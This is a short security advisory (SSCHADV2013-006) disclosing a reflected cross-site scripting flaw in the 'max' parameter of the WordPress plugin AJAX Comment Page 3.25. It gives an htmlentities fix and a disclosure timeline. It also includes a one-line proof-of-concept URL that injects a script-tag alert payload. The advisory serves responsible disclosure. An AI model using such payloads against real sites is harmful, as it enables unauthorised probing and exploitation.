SSCHADV2013-006 - WordPress Plugin 'AJAX Comment Page 3.25' Cross-site scripting vulnerability
Advisory:
|
WordPress Plugin ‘AJAX Comment Page 3.25’ Cross-site scripting vulnerability
|
Advisory ID:
|
SSCHADV2013-006
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on AJAX Comment Page 3.25
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
CVE-ID:
|
Requested
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The parameter ‘max’ of the WordPress plugin ‘AJAX Comment Page’ is prone to a XSS vulnerability
==============
PoC-Exploit
==============
PoC-Exploit
==============
http://[target]/wp-content/plugins/ajax-comment-page/js.php?max=<script>alert(/xss/)</script> |
=====
Solution
=====
// ajax-comment-page/js.php
max = <?php echo htmlentities($_GET["max"]);?>;
================
Disclosure Timeline
================
30-Mar-2013 – informed plugins@wordpress.org
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
http://www.darksecurity.de/advisories/2013/SSCHADV2013-006.txt
Comments
Display comments as Linear | Threaded